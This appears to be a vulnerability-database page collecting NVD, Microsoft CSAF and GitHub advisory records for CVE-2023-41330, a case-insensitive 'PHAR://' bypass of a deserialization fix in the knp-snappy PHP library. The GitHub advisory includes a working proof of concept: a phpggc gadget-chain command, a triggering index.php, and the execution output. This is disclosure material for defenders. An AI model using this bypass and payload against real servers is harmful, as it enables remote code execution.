"url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
},
{
"name": "https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e",
"refsource": "MISC",
"url": "https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e"
}
]
},
"source": {
"advisory": "GHSA-92rv-4j2h-8mjj",
"discovery": "UNKNOWN"
}
},
"nvd.nist.gov": {
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:knplabs:snappy:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.4.3",
"vulnerable": true
}
],
"operator": "OR"
}
]
},
"cve": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2023-41330"
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "en",
"value": "knplabs/knp-snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page.\n## Issue\n\nOn March 17th the vulnerability CVE-2023-28115 was disclosed, allowing an attacker to gain remote code execution through PHAR deserialization. Version 1.4.2 added a check `if (\\strpos($filename, \u0027phar://\u0027) === 0)` in the `prepareOutput` function to resolve this CVE, however if the user is able to control the second parameter of the `generateFromHtml()` function of Snappy, it will then be passed as the `$filename` parameter in the `prepareOutput()` function. In the original vulnerability, a file name with a `phar://` wrapper could be sent to the `fileExists()` function, equivalent to the `file_exists()` PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files. To fix this issue, the string is now passed to the `strpos()` function and if it starts with `phar://`, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using `PHAR://` instead of `phar://`. A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8. This issue has been addressed in commit `d3b742d61a` which has been included in version 1.4.3. Users are advised to upgrade. Users unable to upgrade should ensure that only trusted users may submit data to the `AbstractGenerator-\u003egenerate(...)` function.\n"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "CWE-502"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc",
"refsource": "MISC",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
},
{
"name": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj",
"refsource": "MISC",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj"
},
{
"name": "https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e",
"refsource": "MISC",
"tags": [
"Patch"
],
"url": "https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e"
}
]
}
},
"impact": {
"baseMetricV3": {
"cvssV3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9
}
},
"lastModifiedDate": "2023-09-12T20:42Z",
"publishedDate": "2023-09-06T18:15Z"
}
}
}
FKIE_CVE-2023-41330
Vulnerability from fkie_nvd - Published: 2023-09-06 18:15 - Updated: 2024-11-21 08:21
Severity ?
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
knplabs/knp-snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page.
## Issue
On March 17th the vulnerability CVE-2023-28115 was disclosed, allowing an attacker to gain remote code execution through PHAR deserialization. Version 1.4.2 added a check `if (\strpos($filename, 'phar://') === 0)` in the `prepareOutput` function to resolve this CVE, however if the user is able to control the second parameter of the `generateFromHtml()` function of Snappy, it will then be passed as the `$filename` parameter in the `prepareOutput()` function. In the original vulnerability, a file name with a `phar://` wrapper could be sent to the `fileExists()` function, equivalent to the `file_exists()` PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files. To fix this issue, the string is now passed to the `strpos()` function and if it starts with `phar://`, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using `PHAR://` instead of `phar://`. A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8. This issue has been addressed in commit `d3b742d61a` which has been included in version 1.4.3. Users are advised to upgrade. Users unable to upgrade should ensure that only trusted users may submit data to the `AbstractGenerator->generate(...)` function.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:knplabs:snappy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C2412BC7-4738-4E4B-9382-9C967F55BEC0",
"versionEndExcluding": "1.4.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "knplabs/knp-snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page.\n## Issue\n\nOn March 17th the vulnerability CVE-2023-28115 was disclosed, allowing an attacker to gain remote code execution through PHAR deserialization. Version 1.4.2 added a check `if (\\strpos($filename, \u0027phar://\u0027) === 0)` in the `prepareOutput` function to resolve this CVE, however if the user is able to control the second parameter of the `generateFromHtml()` function of Snappy, it will then be passed as the `$filename` parameter in the `prepareOutput()` function. In the original vulnerability, a file name with a `phar://` wrapper could be sent to the `fileExists()` function, equivalent to the `file_exists()` PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files. To fix this issue, the string is now passed to the `strpos()` function and if it starts with `phar://`, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using `PHAR://` instead of `phar://`. A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8. This issue has been addressed in commit `d3b742d61a` which has been included in version 1.4.3. Users are advised to upgrade. Users unable to upgrade should ensure that only trusted users may submit data to the `AbstractGenerator-\u003egenerate(...)` function.\n"
},
{
"lang": "es",
"value": "knplabs/knp-snappy es una librer\u00eda PHP que permite la generaci\u00f3n de thumbnail, snapshots o PDFs desde una URL o una p\u00e1gina HTML. ## El problema que revel\u00f3 la vulnerabilidad CVE-2023-28115 el 17 de marzo, permite a un atacante obtener la ejecuci\u00f3n remota de c\u00f3digo mediante la deserializaci\u00f3n PHAR. La versi\u00f3n 1.4.2 agreg\u00f3 una verificaci\u00f3n `if (\\strpos($filename, \u0027phar://\u0027) === 0)` en la funci\u00f3n `prepareOutput` para resolver este CVE, sin embargo, si el usuario puede controlar el segundo par\u00e1metro de la funci\u00f3n `generateFromHtml()` de Snappy, luego se pasar\u00e1 como el par\u00e1metro `$filename` en la funci\u00f3n `prepareOutput()`. En la vulnerabilidad original, un nombre de archivo con un contenedor `phar://` podr\u00eda enviarse a la funci\u00f3n `fileExists()`, equivalente a la funci\u00f3n PHP `file_exists()`. Esto permiti\u00f3 a los usuarios activar una deserializaci\u00f3n en archivos PHAR arbitrarios. Para solucionar este problema, la cadena ahora se pasa a la funci\u00f3n `strpos()` y si comienza con `phar://`, se genera una excepci\u00f3n. Sin embargo, como los contenedores de PHP no distinguen entre may\u00fasculas y min\u00fasculas, este parche se puede omitir usando `PHAR://` en lugar de `phar://`. Una explotaci\u00f3n exitosa de esta vulnerabilidad permite ejecutar c\u00f3digo arbitrario y acceder al sistema de archivos subyacente. El atacante debe poder cargar un archivo y el servidor debe ejecutar una versi\u00f3n de PHP anterior a la 8. Este problema se solucion\u00f3 en el commit `d3b742d61a` que se incluy\u00f3 en la versi\u00f3n 1.4.3. Se recomienda a los usuarios que actualicen. Los usuarios que no puedan actualizar deben asegurarse de que solo los usuarios confiables puedan enviar datos a la funci\u00f3n `AbstractGenerator-\u0026gt;generate(...)`."
}
],
"id": "CVE-2023-41330",
"lastModified": "2024-11-21T08:21:05.347",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-09-06T18:15:09.153",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-502"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
MSRC_CVE-2023-41330
Vulnerability from csaf_microsoft - Published: 2023-09-01 00:00 - Updated: 2025-09-03 21:56Summary
Unsafe deserialization in knplabs/knp-snappy
Notes
Additional Resources
To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle
Disclaimer
The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2023-41330 Unsafe deserialization in knplabs/knp-snappy - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2023/msrc_cve-2023-41330.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "Unsafe deserialization in knplabs/knp-snappy",
"tracking": {
"current_release_date": "2025-09-03T21:56:48.000Z",
"generator": {
"date": "2025-10-20T00:40:18.005Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2023-41330",
"initial_release_date": "2023-09-01T00:00:00.000Z",
"revision_history": [
{
"date": "2025-09-03T21:56:48.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"category": "product_name",
"name": "azl3 snappy 1.1.10-2",
"product": {
"name": "azl3 snappy 1.1.10-2",
"product_id": "1"
}
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 snappy 1.1.10-2 as a component of Azure Linux 3.0",
"product_id": "17084-1"
},
"product_reference": "1",
"relates_to_product_reference": "17084"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-41330",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"17084-1"
]
}
],
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"known_not_affected": [
"17084-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-41330 Unsafe deserialization in knplabs/knp-snappy - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2023/msrc_cve-2023-41330.json"
}
],
"title": "Unsafe deserialization in knplabs/knp-snappy"
}
]
}
GHSA-92RV-4J2H-8MJJ
Vulnerability from github – Published: 2023-09-08 12:17 – Updated: 2023-10-10 05:29
VLAI?
Summary
Snappy PHAR deserialization vulnerability
Details
Issue
On March 17th the vulnerability CVE-2023-28115 was disclosed, allowing an attacker to gain remote code execution through PHAR deserialization. To fix this issue, the version 1.4.2 was released with an additional check in the affected function to prevent the usage of the phar:// wrapper. However, because PHP wrappers are case-insensitive and the patch only checks the presence of the phar:// string, it can be bypassed to achieve remote code execution again using a different case.
As for the initial vulnerability, PHP 7 or below is required for a successful exploitation using the deserialization of PHP archives metadata via the phar:// wrapper.
Technical details
Description
The following patch was committed on the 1.4.2 release to fix CVE-2023-28115.
If the user is able to control the second parameter of the generateFromHtml() function of Snappy, it will then be passed as the $filename parameter in the prepareOutput() function. In the original vulnerability, a file name with a phar:// wrapper could be sent to the fileExists() function, equivalent to the file_exists() PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files.
To fix this issue, the string is now passed to the strpos() function and if it starts with phar://, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using PHAR:// instead of phar://.
Proof of Concept
To illustrate the vulnerability, the /tmp/exploit file will be written to the filesystem using a voluntarily added library to trigger the deserialization. The PHP archive is generated using phpggc with the -f option to force a fast destruct on the object. Otherwise, the PHP flow will stop on the first exception and the object destruction will not be called.
$ phpggc -f Monolog/RCE1 exec 'touch /tmp/exploit' -p phar -o exploit.phar
The following index.php file will be used to trigger the vulnerability via the payload PHAR://exploit.phar.
<?php
// index.php
// include autoloader
require __DIR__ . '/vendor/autoload.php';
// reference the snappy namespace
use Knp\Snappy\Pdf;
$snappy = new Pdf('/usr/local/bin/wkhtmltopdf');
$snappy->generateFromHtml('<h1>POC</h1>', 'PHAR://exploit.phar');
Finally once executed, the /tmp/exploit file is successfully created on the filesystem.
$ php index.php
Fatal error: Uncaught InvalidArgumentException: The output file 'PHAR://exploit.phar' already exists and it is a directory. in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php:634
Stack trace:
#0 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(178): Knp\Snappy\AbstractGenerator->prepareOutput('PHAR://exploit.phar', false)
#1 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/Pdf.php(36): Knp\Snappy\AbstractGenerator->generate(Array, 'PHAR://exploit.phar', Array, false)
#2 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(232): Knp\Snappy\Pdf->generate(Array, 'PHAR://exploit.phar', Array, false)
#3 /var/www/index.php(12): Knp\Snappy\AbstractGenerator->generateFromHtml('<h1>POC</h1>', 'PHAR://exploit.phar')
#4 {main}
thrown in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php on line 634
$ ls -l /tmp/exploit
-rw-r--r-- 1 user_exploit user_exploit 0 Jun 14 10:05 exploit
This proof of concept is based on the original one published with CVE-2023-28115.
Impact
A successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8.
Patches
Synacktiv recommends to use a whitelist instead of a blacklist. In this situation, only the wrappers http://, https:// or file:// be available on the function generateFromHtml().
Workarounds
Control user data submitted to the function AbstractGenerator->generate(...)
References
https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc
Credits
Rémi Matasse of Synacktiv (https://synacktiv.com/).
Severity ?
9.8 (Critical)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.4.2"
},
"package": {
"ecosystem": "Packagist",
"name": "knplabs/knp-snappy"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-41330"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2023-09-08T12:17:48Z",
"nvd_published_at": "2023-09-06T18:15:09Z",
"severity": "CRITICAL"
},
"details": "## Issue\n\nOn March 17th the vulnerability [CVE-2023-28115 was disclosed](https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc), allowing an attacker to gain remote code execution through PHAR deserialization. To fix this issue, the version 1.4.2 was released with an additional check in the affected function to prevent the usage of the `phar://` wrapper. However, because PHP wrappers are case-insensitive and the patch only checks the presence of the `phar://` string, it can be bypassed to achieve remote code execution again using a different case.\n\nAs for the initial vulnerability, PHP 7 or below is required for a successful exploitation using the deserialization of PHP archives metadata via the `phar://` wrapper.\n\n## Technical details\n\n### Description\n\nThe following [patch](https://github.com/KnpLabs/snappy/commit/1ee6360cbdbea5d09705909a150df7963a88efd6) was committed on the 1.4.2 release to fix CVE-2023-28115.\n\n\n\nIf the user is able to control the second parameter of the `generateFromHtml()` function of Snappy, it will then be passed as the `$filename` parameter in the `prepareOutput()` function. In the original vulnerability, a file name with a `phar://` wrapper could be sent to the `fileExists()` function, equivalent to the `file_exists()` PHP function. This allowed users to trigger a deserialization on arbitrary PHAR files.\n\nTo fix this issue, the string is now passed to the `strpos()` function and if it starts with `phar://`, an exception is raised. However, PHP wrappers being case insensitive, this patch can be bypassed using `PHAR://` instead of `phar://`.\n\n### Proof of Concept\n\nTo illustrate the vulnerability, the `/tmp/exploit` file will be written to the filesystem using a voluntarily added library to trigger the deserialization. The PHP archive is generated using [phpggc](https://github.com/ambionics/phpggc) with the `-f` option to force a fast destruct on the object. Otherwise, the PHP flow will stop on the first exception and the object destruction will not be called.\n\n```bash\n$ phpggc -f Monolog/RCE1 exec \u0027touch /tmp/exploit\u0027 -p phar -o exploit.phar\n```\nThe following `index.php` file will be used to trigger the vulnerability via the payload `PHAR://exploit.phar`.\n\n```bash\n\u003c?php\n// index.php\n\n// include autoloader\nrequire __DIR__ . \u0027/vendor/autoload.php\u0027;\n\n// reference the snappy namespace\nuse Knp\\Snappy\\Pdf;\n\n$snappy = new Pdf(\u0027/usr/local/bin/wkhtmltopdf\u0027);\n$snappy-\u003egenerateFromHtml(\u0027\u003ch1\u003ePOC\u003c/h1\u003e\u0027, \u0027PHAR://exploit.phar\u0027);\n```\nFinally once executed, the `/tmp/exploit` file is successfully created on the filesystem.\n\n```bash\n$ php index.php \nFatal error: Uncaught InvalidArgumentException: The output file \u0027PHAR://exploit.phar\u0027 already exists and it is a directory. in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php:634\nStack trace:\n#0 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(178): Knp\\Snappy\\AbstractGenerator-\u003eprepareOutput(\u0027PHAR://exploit.phar\u0027, false)\n#1 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/Pdf.php(36): Knp\\Snappy\\AbstractGenerator-\u003egenerate(Array, \u0027PHAR://exploit.phar\u0027, Array, false)\n#2 /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php(232): Knp\\Snappy\\Pdf-\u003egenerate(Array, \u0027PHAR://exploit.phar\u0027, Array, false)\n#3 /var/www/index.php(12): Knp\\Snappy\\AbstractGenerator-\u003egenerateFromHtml(\u0027\u003ch1\u003ePOC\u003c/h1\u003e\u0027, \u0027PHAR://exploit.phar\u0027)\n#4 {main}\n thrown in /var/www/vendor/knplabs/knp-snappy/src/Knp/Snappy/AbstractGenerator.php on line 634\n \n$ ls -l /tmp/exploit\n-rw-r--r-- 1 user_exploit user_exploit 0 Jun 14 10:05 exploit\n```\n\nThis proof of concept is based on the original one published with CVE-2023-28115.\n\n### Impact\n\nA successful exploitation of this vulnerability allows executing arbitrary code and accessing the underlying filesystem. The attacker must be able to upload a file and the server must be running a PHP version prior to 8.\n\n## Patches\nSynacktiv recommends to use a whitelist instead of a blacklist. In this situation, only the wrappers `http://`, `https://` or `file://` be available on the function `generateFromHtml()`.\n\n## Workarounds\nControl user data submitted to the function `AbstractGenerator-\u003egenerate(...)`\n\n## References\nhttps://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc\n\n## Credits\nR\u00e9mi Matasse of Synacktiv (https://synacktiv.com/).\n",
"id": "GHSA-92rv-4j2h-8mjj",
"modified": "2023-10-10T05:29:07Z",
"published": "2023-09-08T12:17:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-92rv-4j2h-8mjj"
},
{
"type": "WEB",
"url": "https://github.com/KnpLabs/snappy/security/advisories/GHSA-gq6w-q6wh-jggc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41330"
},
{
"type": "WEB",
"url": "https://github.com/KnpLabs/snappy/commit/d3b742d61a68bf93866032c2c0a7f1486128b67e"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/knplabs/knp-snappy/CVE-2023-41330.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/KnpLabs/snappy"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-92rv-4j2h-8mjj"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Snappy PHAR deserialization vulnerability"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…